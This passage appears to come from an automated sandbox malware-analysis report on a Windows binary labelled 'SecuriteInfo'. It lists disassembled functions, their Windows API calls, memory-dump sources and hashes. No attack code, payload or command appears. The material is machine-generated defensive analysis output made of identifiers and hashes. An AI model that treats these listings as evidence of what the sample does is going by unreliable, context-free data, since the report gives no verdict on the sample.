                              • Opcode Fuzzy Hash: c0e85ebfe12c70219afc26efc82ec193e06ca8b3587dddb88984c7d5565e03b0
                              • Instruction Fuzzy Hash: 5B21F932204248FFEB255B799C49E7B7B98FF4A760F01413AFC05CA2A1EF61DC419661
                              Function 0090B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090B44C
                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0090B471
                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0090B489
                              • GetSystemMetrics.USER32(00000004), ref: 0090B4B2
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008F1184,00000000), ref: 0090B4D0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Long$MetricsSystem
                              • String ID:
                              • API String ID: 2294984445-0
                              • Opcode ID: e380e0a0e30142ae0910ff88d4903e492dbb8855c84725db0f99672912e55c29
                              • Instruction ID: 2b16aaceec89b4fe5c4efa86ac1a205168fadc5d243e94c7569bd85d7358c61c
                              • Opcode Fuzzy Hash: e380e0a0e30142ae0910ff88d4903e492dbb8855c84725db0f99672912e55c29
                              • Instruction Fuzzy Hash: 98219571524255AFCB209F39CC54A6A37A8FB05720F154B38FD26D76F1E7309A50EB90
                              Function 008D97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D9802
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9834
                              • __itow.LIBCMT ref: 008D984C
                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9874
                              • __itow.LIBCMT ref: 008D9885
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$__itow$_memmove
                              • String ID:
                              • API String ID: 2983881199-0
                              • Opcode ID: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                              • Instruction ID: bc12aada8573d5c72aacd67df957bd366627da1998eb1c4fbef0cfba1c10dfa7
                              • Opcode Fuzzy Hash: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                              • Instruction Fuzzy Hash: B221DA31B00208AFDB20AA658C86EEE7BB9FF4AB14F140136FD45DB351D671DD41A792
                              Function 008812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                              Download Yara Rule
                              APIs
                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                              • SelectObject.GDI32(?,00000000), ref: 0088135C
                              • BeginPath.GDI32(?), ref: 00881373
                              • SelectObject.GDI32(?,00000000), ref: 0088139C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ObjectSelect$BeginCreatePath
                              • String ID:
                              • API String ID: 3225163088-0
                              • Opcode ID: 001dea02a9c2f69524c335183420bc29f97d415aa59227d15b57c28e560e589b
                              • Instruction ID: 61d21b3c8534c431f812fe0fc12d50a92f657f2833ef26fe49b945afe10f5b68
                              • Opcode Fuzzy Hash: 001dea02a9c2f69524c335183420bc29f97d415aa59227d15b57c28e560e589b
                              • Instruction Fuzzy Hash: 3C2162B4828308DFDF219F25DC08B697BB8FB12322F144225F414D67A0DB759992EB91
                              Function 008DC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID:
                              • API String ID: 2931989736-0
                              • Opcode ID: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                              • Instruction ID: fdd9ef3d68a64f66f80602a58f45960c5b2348a7c1937313c7eb8d534cce9ab4
                              • Opcode Fuzzy Hash: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                              • Instruction Fuzzy Hash: 6001967170422B7BEA04B6255C46EAB775CFF623A8F044212FE04D6383E6609E11C2E1
                              Function 008E4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 008E4D5C
                              • __beginthreadex.LIBCMT ref: 008E4D7A
                              • MessageBoxW.USER32(?,?,?,?), ref: 008E4D8F
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008E4DA5
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008E4DAC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                              • String ID:
                              • API String ID: 3824534824-0
                              • Opcode ID: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                              • Instruction ID: c288b7a8e06307dccab53b3bb471b80204bc55dd3208929d216f60be6f2eef89
                              • Opcode Fuzzy Hash: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                              • Instruction Fuzzy Hash: 731148B6A18248BFC7108FA89C04E9A7FACFB87320F144265F928D3250C6B18D0497A1
                              Function 008D874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                              • GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                              • GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                              • HeapAlloc.KERNEL32(00000000,?,008D822A,?,?,?), ref: 008D8786
                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 842720411-0
                              • Opcode ID: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                              • Instruction ID: a029189f417080a2837b696860bc1cc72694e68deaf9d9116cde0a329747dc0b
                              • Opcode Fuzzy Hash: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                              • Instruction Fuzzy Hash: D4016D71614208FFDB204FA6DC98D6B7BADFF89355720053AF849C2260DA329D40DA60
                              Function 008E54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                              Download Yara Rule
                              APIs
                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5502
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5510
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5518
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5522
                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: f15bacb959cd06df61691586fb3df340f804806378888bcfa3e49be9539c84bf
                              • Instruction ID: e1ea4217fdb6c20568a3f7eb82b96809383b741121d7f5311792d3f8927cc4b3
                              • Opcode Fuzzy Hash: f15bacb959cd06df61691586fb3df340f804806378888bcfa3e49be9539c84bf
                              • Instruction Fuzzy Hash: 03016D31D18A1DDBCF10DFE9E8985EDBB79FB0A715F400056E801F2540DB309654D7A1
                              Function 008D7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                              Download Yara Rule
                              APIs
                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?,?,008D799D), ref: 008D766F
                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D768A
                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D7698
                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?), ref: 008D76A8
                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D76B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: From$Prog$FreeStringTasklstrcmpi
                              • String ID:
                              • API String ID: 3897988419-0
                              • Opcode ID: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                              • Instruction ID: a7635f9374926504eff1c9466c5a3c43598b98c767924322e631dbb87aeb02be
                              • Opcode Fuzzy Hash: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                              • Instruction Fuzzy Hash: 59017172615605AFDB209F58EC44AAA7BADFB44751F14412AFD05D2211F731DE40A7A0
                              Function 008D85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008D8628
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapInformationToken$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 44706859-0
                              • Opcode ID: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                              • Instruction ID: 9e201a4b9b0bb6d659ef51e331a1adea2de6af731156759d8b93155607b9c698
                              • Opcode Fuzzy Hash: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                              • Instruction Fuzzy Hash: C6F04F31219304EFEB200FA9EC9DE6B3BACFF89764B004526F945C6250CB61DD41EA60
                              Function 008D8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8689
                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapInformationToken$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 44706859-0
                              • Opcode ID: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                              • Instruction ID: bd1e3b698592f5a79b0e8b9180156b75416e02b111f772602558c2209d5825c7
                              • Opcode Fuzzy Hash: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                              • Instruction Fuzzy Hash: C8F04F71214304FFEB211FA5EC9CE673BACFF89764B100126F945C7250CA61DA41EA60
                              Function 008DC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 008DC6BA
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 008DC6D1
                              • MessageBeep.USER32(00000000), ref: 008DC6E9
                              • KillTimer.USER32(?,0000040A), ref: 008DC705
                              • EndDialog.USER32(?,00000001), ref: 008DC71F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 9959ee60187e95a7b20d141900f81f6c3f0eb04f808ca09eac0ffd650b184a94
                              • Instruction ID: 2a76fe1a56d3a90bbb20e009aba9cc31639f326908885cecea342dc31c8b4e50
                              • Opcode Fuzzy Hash: 9959ee60187e95a7b20d141900f81f6c3f0eb04f808ca09eac0ffd650b184a94
                              • Instruction Fuzzy Hash: 4F018F30414709ABEB315B24EC5EF9677B8FB00705F04066AF582E15E0DBE1AA54DB80
                              Function 008813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              • EndPath.GDI32(?), ref: 008813BF
                              • StrokeAndFillPath.GDI32(?,?,008BBAD8,00000000,?), ref: 008813DB
                              • SelectObject.GDI32(?,00000000), ref: 008813EE
                              • DeleteObject.GDI32 ref: 00881401
                              • StrokePath.GDI32(?), ref: 0088141C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Path$ObjectStroke$DeleteFillSelect
                              • String ID:
                              • API String ID: 2625713937-0
                              • Opcode ID: 5f6c4aa4aed902c055a1f690cf58bc90ed23c2e35013ab0c8122eb287724130c
                              • Instruction ID: e9df6116cf7c0bde632ba2b5bc7c98953684a7e95883881fad69eeed81b3a1c1
                              • Opcode Fuzzy Hash: 5f6c4aa4aed902c055a1f690cf58bc90ed23c2e35013ab0c8122eb287724130c
                              • Instruction Fuzzy Hash: DAF0BBB4028308DFDB215F16EC1CB543FA9F702326F04C224E42985AB1C7354596EF55
                              Function 008EC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                              Download Yara Rule
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 008EC69D
                              • CoCreateInstance.OLE32(00912D6C,00000000,00000001,00912BDC,?), ref: 008EC6B5
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • CoUninitialize.OLE32 ref: 008EC922
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_memmove
                              • String ID: .lnk
                              • API String ID: 2683427295-24824748
                              • Opcode ID: 6fabe454fac54d6b1aa58e32e43aa04b0541977867022e1bbc2166155d75de3e
                              • Instruction ID: 8f4a432177ba66e2cf07f9644c3217a68676f663d31b9358a36c0191f9acfefe
                              • Opcode Fuzzy Hash: 6fabe454fac54d6b1aa58e32e43aa04b0541977867022e1bbc2166155d75de3e
                              • Instruction Fuzzy Hash: A7A11871108205AFD304FF58C891EABB7E8FF95708F044959F196D72A2EB70EA49CB52
                              Function 00892E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 00887BB1: _memmove.LIBCMT ref: 00887C0B
                              • __swprintf.LIBCMT ref: 0089302D
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00892EC6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 1943609520-557222456
                              • Opcode ID: fb2982b3b0cbf8f3d74a07cbcfb86b9534a3c5fb307267dc9f2b9f446ddaf6e4
                              • Instruction ID: fdbeb97854c37d10cee3fecbdc7b86cfffe0d14aa0457487b794782c808e3e8f
                              • Opcode Fuzzy Hash: fb2982b3b0cbf8f3d74a07cbcfb86b9534a3c5fb307267dc9f2b9f446ddaf6e4
                              • Instruction Fuzzy Hash: 10914531518601AFCB28FF28D885D6AB7B4FF85750F14492DF492DB2A1EA70EE44CB52
                              Function 008EBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                              • CoInitialize.OLE32(00000000), ref: 008EBC26
                              • CoCreateInstance.OLE32(00912D6C,00000000,00000001,00912BDC,?), ref: 008EBC3F
                              • CoUninitialize.OLE32 ref: 008EBC5C
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                              • String ID: .lnk
                              • API String ID: 2126378814-24824748
                              • Opcode ID: 4e39c09521d300ba7f4056e1ad69e211d73abc9eee4e40cc172090ea200e9d39
                              • Instruction ID: bd4e5cde5e89deef9fc827ce70d951085aa881022f3c67234b780251137aa817
                              • Opcode Fuzzy Hash: 4e39c09521d300ba7f4056e1ad69e211d73abc9eee4e40cc172090ea200e9d39
                              • Instruction Fuzzy Hash: 95A132756043419FCB10EF19C884D6ABBE5FF89314F148998F89ADB2A1CB31ED45CB92
                              Function 008A524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                              Download Yara Rule
                              APIs
                              • __startOneArgErrorHandling.LIBCMT ref: 008A52DD
                                • Part of subcall function 008B0340: __87except.LIBCMT ref: 008B037B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
